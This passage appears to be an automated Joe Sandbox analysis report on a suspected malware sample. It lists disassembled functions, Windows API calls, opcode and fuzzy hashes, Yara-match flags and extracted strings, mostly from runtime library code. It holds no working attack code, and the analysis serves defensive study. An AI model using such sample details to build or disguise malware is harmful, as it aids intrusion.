                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                  • String ID:
                                                  • API String ID: 2744216297-0
                                                  • Opcode ID: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                                  • Instruction ID: e182fa176b596d651ba3484f1012657cf00b5fef4cb1dd311ab1bc31a0a6f155
                                                  • Opcode Fuzzy Hash: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                                  • Instruction Fuzzy Hash: 53F030368002A9BBEF125F95CC48EC93FA6FB0D3E0F018025FA0885130DA32C9609B90
                                                  Function 00685979 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,00000000,?,00685626,00000000,00000001,00000000,00000000,?,006828A5,?,00000000,00000000), ref: 00685990
                                                  • GetLastError.KERNEL32(?,00685626,00000000,00000001,00000000,00000000,?,006828A5,?,00000000,00000000,?,00000000,?,00682DF1,?), ref: 0068599C
                                                    • Part of subcall function 00685962: CloseHandle.KERNEL32(00437A50,006859AC,?,00685626,00000000,00000001,00000000,00000000,?,006828A5,?,00000000,00000000,?,00000000), ref: 00685972
                                                  • ___initconout.LIBCMT ref: 006859AC
                                                    • Part of subcall function 00685924: CreateFileW.KERNEL32(00432C28,40000000,00000003,00000000,00000003,00000000,00000000,00685953,00685613,00000000,?,006828A5,?,00000000,00000000,?), ref: 00685937
                                                  • WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,?,00685626,00000000,00000001,00000000,00000000,?,006828A5,?,00000000,00000000,?), ref: 006859C1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                  • String ID:
                                                  • API String ID: 2744216297-0
                                                  • Opcode ID: 53cd3a76a3655e62aab72a6b20d7f3bfc1b13ff990dc26beec92c4dbadd610bd
                                                  • Instruction ID: 56762ad33869ae4f551612670d563d60930a2ec07e37630a1d65ed288cc36681
                                                  • Opcode Fuzzy Hash: 53cd3a76a3655e62aab72a6b20d7f3bfc1b13ff990dc26beec92c4dbadd610bd
                                                  • Instruction Fuzzy Hash: 5FF01C36501658FBCF223F91DC04A9E3F67EB087B0B044124FB1A95120CA328921AB98
                                                  Function 0040D194 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SleepConditionVariableCS.KERNELBASE(?,0040D131,00000064), ref: 0040D1B7
                                                  • LeaveCriticalSection.KERNEL32(004383D4,00438EBC,?,0040D131,00000064,?,?,?,00401047,00438EBC), ref: 0040D1C1
                                                  • WaitForSingleObjectEx.KERNEL32(00438EBC,00000000,?,0040D131,00000064,?,?,?,00401047,00438EBC), ref: 0040D1D2
                                                  • EnterCriticalSection.KERNEL32(004383D4,?,0040D131,00000064,?,?,?,00401047,00438EBC), ref: 0040D1D9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                  • String ID:
                                                  • API String ID: 3269011525-0
                                                  • Opcode ID: fdac45ff0301cbc5be18b6aebdbeb671c9e98f82b4ff16bb29f89a80dabf72b2
                                                  • Instruction ID: 47a6f121230fc22ef05d7342d51693ac5d84e3dbad3790f0b82a870593218e11
                                                  • Opcode Fuzzy Hash: fdac45ff0301cbc5be18b6aebdbeb671c9e98f82b4ff16bb29f89a80dabf72b2
                                                  • Instruction Fuzzy Hash: 67E09B31601724A7C7111B50EC08A9EBE18AF0DF50F01503AFD06663A08F661A1687CC
                                                  Function 100067E8 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 100067F1
                                                    • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                    • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                  • _free.LIBCMT ref: 10006804
                                                  • _free.LIBCMT ref: 10006815
                                                  • _free.LIBCMT ref: 10006826
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: debb3193547cbbcb7717f1e4cdc42473b8e46860ea64e0849bed9af40c6c58a4
                                                  • Instruction ID: 2a5a278bef7b5ad6e03033ca92f6b3e0bb2fc7991e1f46602c590ec50041d4ba
                                                  • Opcode Fuzzy Hash: debb3193547cbbcb7717f1e4cdc42473b8e46860ea64e0849bed9af40c6c58a4
                                                  • Instruction Fuzzy Hash: FBE0E675D10131BAF711EF249C8644E3FA1F799A503068015F528222B7C7369751DFE3
                                                  Function 0067728A Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00677293
                                                    • Part of subcall function 0067994F: HeapFree.KERNEL32(00000000,00000000,?,006800E2,?,00000000,?,?,?,00680385,?,00000007,?,?,00680878,?), ref: 00679965
                                                    • Part of subcall function 0067994F: GetLastError.KERNEL32(?,?,006800E2,?,00000000,?,?,?,00680385,?,00000007,?,?,00680878,?,?), ref: 00679977
                                                  • _free.LIBCMT ref: 006772A6
                                                  • _free.LIBCMT ref: 006772B7
                                                  • _free.LIBCMT ref: 006772C8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 9f0fc7f5ab5ba42612596697ff71def71168718cc3928d9298bfe44f1fd2fb1c
                                                  • Instruction ID: 44775214cbd6052150787cbd9a5011cc9c7ecc452190254d4d821e983553182b
                                                  • Opcode Fuzzy Hash: 9f0fc7f5ab5ba42612596697ff71def71168718cc3928d9298bfe44f1fd2fb1c
                                                  • Instruction Fuzzy Hash: 79E0ECB1800322AEE6437F19BC0244BFEA2EB44B30305A02FF52816A35DF3D25529F9D
                                                  Function 0041EB4F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCPInfo.KERNEL32(0000FDE9,?,0000000C,00000000,00000000), ref: 0041EB81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: Info
                                                  • String ID: $uA
                                                  • API String ID: 1807457897-4017129421
                                                  • Opcode ID: a14bebe26d15cb7d607a1ee63d9f01fe60d0c69c00d09c35d35dffd6adefb78f
                                                  • Instruction ID: 76fe35182010dd4070079eecf5458fb6316312039bb569af5976c5917f7ade40
                                                  • Opcode Fuzzy Hash: a14bebe26d15cb7d607a1ee63d9f01fe60d0c69c00d09c35d35dffd6adefb78f
                                                  • Instruction Fuzzy Hash: EE4150745082489BDB218B19CD84FFB7BFDEB15304F2404AED9CB87142E23CA9C59B99
                                                  Function 0066FD87 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0066FDC6
                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0066FE7A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable___except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 3480331319-1018135373
                                                  • Opcode ID: 273efe6150e4a2726b12b48060be4535457cf5dcd07bd1ee1b29e53da4973c9f
                                                  • Instruction ID: f6d74b21f7694bdf5a166c1a5b5ca2c3cc9fbadf8d8baf4b03937672bdb48def
                                                  • Opcode Fuzzy Hash: 273efe6150e4a2726b12b48060be4535457cf5dcd07bd1ee1b29e53da4973c9f
                                                  • Instruction Fuzzy Hash: 9A418734A00209EBCF20DF68D884ADDBFB6AF45314F14C169EC199B3A2D7369E15CB95
                                                  Function 004103FC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00410421
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID: MOC$RCC
                                                  • API String ID: 2118026453-2084237596
                                                  • Opcode ID: b6581cea79e6053c56ddbaba1da26d4b44f1b87f66912959a96a6225f5ac6c40
                                                  • Instruction ID: e60aaeaf298b3da1b7730a43453d697d135fa25be288e1f3ddcf15ba3106ce2b
                                                  • Opcode Fuzzy Hash: b6581cea79e6053c56ddbaba1da26d4b44f1b87f66912959a96a6225f5ac6c40
                                                  • Instruction Fuzzy Hash: A0417971900209EFCF15DF94C981AEE7BB6FF48304F14806AFA0566252D3799AA0DF54
                                                  Function 100044D6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • EncodePointer.KERNEL32(00000000,?), ref: 100044FB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID: MOC$RCC
                                                  • API String ID: 2118026453-2084237596
                                                  • Opcode ID: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                                  • Instruction ID: 0fa13f4c886c2deeb8e1184eea68dc96f9460117e0f406c7378fe553058e7938
                                                  • Opcode Fuzzy Hash: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                                  • Instruction Fuzzy Hash: 7B419DB5900109AFEF06CF94CC81AEE7BB5FF48384F168059F9046B25AD736EA50CB55
                                                  Function 00670663 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlEncodePointer.NTDLL(00000000), ref: 00670688
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID: MOC$RCC
                                                  • API String ID: 2118026453-2084237596
                                                  • Opcode ID: b6581cea79e6053c56ddbaba1da26d4b44f1b87f66912959a96a6225f5ac6c40
                                                  • Instruction ID: 025101661f29c4a244a8764d7441dd502ac3ee10ea94981bf137a2a7d12d25fb
                                                  • Opcode Fuzzy Hash: b6581cea79e6053c56ddbaba1da26d4b44f1b87f66912959a96a6225f5ac6c40
                                                  • Instruction Fuzzy Hash: F3414972900209EFDF15DF94C881AEEBBB6FF48304F148159F908A7261D335A960DFA5
                                                  Function 0067C073 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0067C143
                                                  • __freea.LIBCMT ref: 0067C14C
                                                    • Part of subcall function 0067A5FC: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0067A62E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeapStringType__freea
                                                  • String ID: :Vg
                                                  • API String ID: 4073780324-3918182269
                                                  • Opcode ID: b99b28f387eafb06030c840d9611258a78283c5f8ef2eecfdd8ea2824b8dc7c0
                                                  • Instruction ID: 7bc03414a4755a234c6b34ad689dd3fd4893623c68c660dfe074575ebeedcf1f
                                                  • Opcode Fuzzy Hash: b99b28f387eafb06030c840d9611258a78283c5f8ef2eecfdd8ea2824b8dc7c0
                                                  • Instruction Fuzzy Hash: C331907290021AABDB209F64CC41DEF7BB6EF84720F45856CF808A7252D735C951CBA4
                                                  Function 0067EF36 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0067ECE0: GetOEMCP.KERNEL32(00000000,0067EF51,00000000,00000000,0067933A,0067933A,00000000,004280A0,00000000), ref: 0067ED0B
                                                  • _free.LIBCMT ref: 0067EFAE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: 0uC
                                                  • API String ID: 269201875-1723310363
                                                  • Opcode ID: efdb9210a3a48cac013b61cbf6915b30911a4848a99ba8911043eab9c7e55cc9
                                                  • Instruction ID: aa76a90e8650a5fd14a854dc3b87d487763c85eb3fd40f4fb1d37011332e99ba
                                                  • Opcode Fuzzy Hash: efdb9210a3a48cac013b61cbf6915b30911a4848a99ba8911043eab9c7e55cc9
                                                  • Instruction Fuzzy Hash: BC31E271900209AFDB11DF68C881ADE77F6FF49324F1580AAF8199B2A1EB369D14CF54
                                                  Function 0067172B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: hpC
                                                  • API String ID: 269201875-2037328470
                                                  • Opcode ID: 1b100de3c26682a7f9767b5ea4feff90415715e550a8ba004f642e5c751d246c
                                                  • Instruction ID: db70a62786281f505fb3678f1e9e11f12dc2c5b8edfb021eae7c372a6b545b87
                                                  • Opcode Fuzzy Hash: 1b100de3c26682a7f9767b5ea4feff90415715e550a8ba004f642e5c751d246c
                                                  • Instruction Fuzzy Hash: C1112671A003124ADB249B2CAC45B5173E7AB62734F14A63FF528CF6D1FB70D8424B88
                                                  Function 00401300 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040D10C: EnterCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D117
                                                    • Part of subcall function 0040D10C: LeaveCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D154
                                                  • __Init_thread_footer.LIBCMT ref: 00401382
                                                    • Part of subcall function 0040D0C2: EnterCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0CC
                                                    • Part of subcall function 0040D0C2: LeaveCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0FF
                                                    • Part of subcall function 0040D0C2: RtlWakeAllConditionVariable.NTDLL ref: 0040D176
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                  • String ID: AOJ.$AY@B
                                                  • API String ID: 2296764815-514806208
                                                  • Opcode ID: 28e8001ad5e0de1ed841116e899c8068640d3552ed5b59b288d88da72c20cc32
                                                  • Instruction ID: e40916875604ea4a6387975861e2a6da87038d1f1b262f1bab1aa9f1cf823530
                                                  • Opcode Fuzzy Hash: 28e8001ad5e0de1ed841116e899c8068640d3552ed5b59b288d88da72c20cc32
                                                  • Instruction Fuzzy Hash: 6921F6709047448AD7009F79D9457A9F761EF69314F00627EF8442B2E2DF7C26848F4C
                                                  Function 00661567 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0066D373: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0066D37E
                                                    • Part of subcall function 0066D373: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0066D3BB
                                                  • __Init_thread_footer.LIBCMT ref: 006615E9
                                                    • Part of subcall function 0066D329: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0066D333
                                                    • Part of subcall function 0066D329: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0066D366
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                  • String ID: AOJ.$AY@B
                                                  • API String ID: 4132704954-514806208
                                                  • Opcode ID: b9e0837025cba329fbcf64bc808262b66bca67f2aea9b36a55b2a3a41771e812
                                                  • Instruction ID: ab22fc92ec8c70cae93084c8bf4525321039fcee6f4c0b4bf91c93a1f4f3f367
                                                  • Opcode Fuzzy Hash: b9e0837025cba329fbcf64bc808262b66bca67f2aea9b36a55b2a3a41771e812
                                                  • Instruction Fuzzy Hash: 8A2105B0E00B449ADB40DF28DE563A8F372EF6A324F04666DF4455B262DF7826848F5C
                                                  Function 0044580D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • __getptd.LIBCMT ref: 0044581C
                                                    • Part of subcall function 00444E8A: __getptd_noexit.LIBCMT ref: 00444E8D
                                                    • Part of subcall function 00444E8A: __amsg_exit.LIBCMT ref: 00444E9A
                                                  • __getptd.LIBCMT ref: 0044582A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                  • String ID: csm
                                                  • API String ID: 803148776-1018135373
                                                  • Opcode ID: 01a1e967625ed6c6770a7791deda9e1ea86a892e60357f606615257162c40619
                                                  • Instruction ID: b24ed93f697569ef2b6d5a59d689d3c4a5cd8684907444e261ebae58725f1bd4
                                                  • Opcode Fuzzy Hash: 01a1e967625ed6c6770a7791deda9e1ea86a892e60357f606615257162c40619
                                                  • Instruction Fuzzy Hash: F1018F31800E049FEF38AF65C44066EB3B5FF10311F64442FE04196662CF388EA1CB48
                                                  Function 00408B00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040D10C: EnterCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D117
                                                    • Part of subcall function 0040D10C: LeaveCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D154
                                                  • __Init_thread_footer.LIBCMT ref: 00408B6E
                                                    • Part of subcall function 0040D0C2: EnterCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0CC
                                                    • Part of subcall function 0040D0C2: LeaveCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0FF
                                                    • Part of subcall function 0040D0C2: RtlWakeAllConditionVariable.NTDLL ref: 0040D176
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                  • String ID: G@ZK$[@G_
                                                  • API String ID: 2296764815-2338778587
                                                  • Opcode ID: f3c37158fd1a5ba24e5957b92d51df72453808ab86ccf4dff184a90d1cc4fc29
                                                  • Instruction ID: 17a8e3a08237a3d1dc64ba2a9f184f2dca1eb4f57e0bda546bf79f670ee7aec5
                                                  • Opcode Fuzzy Hash: f3c37158fd1a5ba24e5957b92d51df72453808ab86ccf4dff184a90d1cc4fc29
                                                  • Instruction Fuzzy Hash: 9F01D670F10348CBC710DFA89D82A6DF771AB19714F50567EF41577291DF79A8048B49
                                                  Function 00408540 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040D10C: EnterCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D117
                                                    • Part of subcall function 0040D10C: LeaveCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D154
                                                  • __Init_thread_footer.LIBCMT ref: 004085AE
                                                    • Part of subcall function 0040D0C2: EnterCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0CC
                                                    • Part of subcall function 0040D0C2: LeaveCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0FF
                                                    • Part of subcall function 0040D0C2: RtlWakeAllConditionVariable.NTDLL ref: 0040D176
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                  • String ID: G@ZK$[@G_
                                                  • API String ID: 2296764815-2338778587
                                                  • Opcode ID: 74763786bad2c4d3dd100b184df71d5764205cf094470d97c820901261546f57
                                                  • Instruction ID: 7550eea810b6cd8f49eb53c2daec38c4b189c5a8056250b59824f6cde468e405
                                                  • Opcode Fuzzy Hash: 74763786bad2c4d3dd100b184df71d5764205cf094470d97c820901261546f57
                                                  • Instruction Fuzzy Hash: 8F01D670E10344DBC710DFA89D42569F7B1A719310F20167EF525773D1DF39A9058B89
                                                  Function 00668D67 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0066D373: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0066D37E
                                                    • Part of subcall function 0066D373: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0066D3BB
                                                  • __Init_thread_footer.LIBCMT ref: 00668DD5
                                                    • Part of subcall function 0066D329: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0066D333
                                                    • Part of subcall function 0066D329: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0066D366
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                  • String ID: G@ZK$[@G_
                                                  • API String ID: 4132704954-2338778587
                                                  • Opcode ID: 8999f0e57ceb1786d7004981ee868414a5535114fb6a47991eafc78d05310499
                                                  • Instruction ID: d9b0b4046db20cbc467b3ed493af72117ba7e73185b7959171e760196f49a416
                                                  • Opcode Fuzzy Hash: 8999f0e57ceb1786d7004981ee868414a5535114fb6a47991eafc78d05310499
                                                  • Instruction Fuzzy Hash: AB01D170F10348EBCB00DF68AC82A6DF3B2AB19710F50166DF025A7391DF75A8008F59
                                                  Function 006687A7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0066D373: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0066D37E
                                                    • Part of subcall function 0066D373: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0066D3BB
                                                  • __Init_thread_footer.LIBCMT ref: 00668815
                                                    • Part of subcall function 0066D329: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0066D333
                                                    • Part of subcall function 0066D329: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0066D366
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                  • String ID: G@ZK$[@G_
                                                  • API String ID: 4132704954-2338778587
                                                  • Opcode ID: 439fb9c81a17ac7d691c5378ecbccf5710fab0366b31c832fa7975013d5444bb
                                                  • Instruction ID: 6fce3e2ddfec89e8bba72034484bf38e8192c19bddf88018f89fdeb2339810cd
                                                  • Opcode Fuzzy Hash: 439fb9c81a17ac7d691c5378ecbccf5710fab0366b31c832fa7975013d5444bb
